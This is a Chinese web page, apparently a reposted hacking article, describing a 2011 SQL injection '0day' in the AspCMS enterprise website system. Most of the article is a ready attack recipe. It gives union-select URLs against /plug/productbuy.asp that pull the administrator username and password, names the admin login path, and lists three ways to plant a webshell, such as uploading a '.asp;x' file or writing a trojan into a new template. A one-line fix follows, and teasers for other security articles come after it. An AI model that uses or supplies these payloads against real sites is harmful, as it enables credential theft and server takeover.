aspcms企业建站系统0day漏洞介绍

发布时间：2011-09-26 01:04:08 作者：佚名

aspcms企业建站系统0day 2.0以上通杀2011-08-14 19:21aspcms开发的全新内核的开源企业建站系统，能够胜任企业多种建站需求，并且支持模版自定义、支持扩展插件等等，能够在短时间内完成企业建站。

漏洞出现在
/plug/productbuy.asp
对接收的参数id没有进行过滤而导致的注入漏洞
注入后的页面有跳转，所以要快，建议用快捷键复制
爆用户名
/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
这是爆ID=1的账户名，如果发现权限不够可以往后试2,3,4...........

爆密码
/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

后台登录地址：/admin/login.asp

后台拿shell
1、直接上传.asp;x
2、系统配置信息
3、模版管理新建1.asp模板，内容写马的内容.

修复方法： id用cint(request("id"))

Tag：ASPCMS 0day

192.168.1.1进入路由器默认的用户名和密码是多少常用路由默认密码大全
本文把路由器常用的品牌的默认的密码都发出来.供大家参考
2012-05-28
加强企业Linux系统安全的若干方法
世界上没有绝对安全的系统，即使是普遍认为稳定的Linux系统，在管理和安全方面也存在不足之处。我们期望让系统尽量在承担低风险的情况下工作，这就要加强对系统安全的管理
2009-08-13
运用动态安全域保护企业网的方法
网络安全域是指同一系统内有相同的安全保护需求、相互信任，并具有相同的安全访问控制和边界控制策略的子网或网络，相同的网络安全域共享一样的安全策略
2012-07-20
全面巩固企业的内网安全的10个招数
几乎所有企业对于网络安全的重视程度一下子提高了，纷纷采购防火墙等设备希望堵住来自Internet的不安全因素。然而，Intranet内部的攻击和入侵却依然猖狂。事实证明，公司内
2012-05-14
mcafee 企业版8.0 i设置指南(图文)
这里要说的就是是否扫描压缩文件，我的建议是不扫描，因为扫描他们会花去大量的时间，即时里面有病毒，也需要先解压出来，就是直接运行也要解压到临时文件夹，这个时候麦咖
2009-10-08
万博企业网站管理系统注入漏洞(MemberLogin.asp)
这个注入漏洞发生在html/MemberLogin.asp文件里，在Include下有NoSqlHack.Asp文件也没调用，呵呵，就有了我们利用的地方了
2011-11-19
常见网络安全问题及解决办法
网络安全是一门涉及计算机、网络、通讯、密码、信息安全、应用数学、数论、信息论等多种学科的综合性学科，涉及面极广，而且不断更新和发展
2013-03-20
Nmap网络安全扫描器说明
Nmap网络安全扫描器说明(Linux )信息来源：苏樱作者：Fyodor 译者：quack名称: nmap - 网络勘察工具和安全扫描器摘要nmap [扫描类型] [选项] <主机或网络 #1 ... [#N]&g
2008-10-08
加强计算机的网络安全级别控制设置的方法防止非法攻击
网络安全永远是预防大于被动的杀毒.防患于未然
2012-05-31
怎么采用DirectAccess来保护企业的网络安全
现在微软在Windows Server 2008 R2和Windows 7中引入了DirectAccess新功能，它是专为替代VPN连接而设计的下一代网络连接。而且不需要用户手动连接VPN，只需打开浏览器，系
2016-07-06

软件下载

源码下载

软件编程

网络编程

在线工具

数据库

CMS

常用工具

aspcms企业建站系统0day漏洞介绍

相关文章

最新评论

文章分类

大家感兴趣的内容

最近更新的内容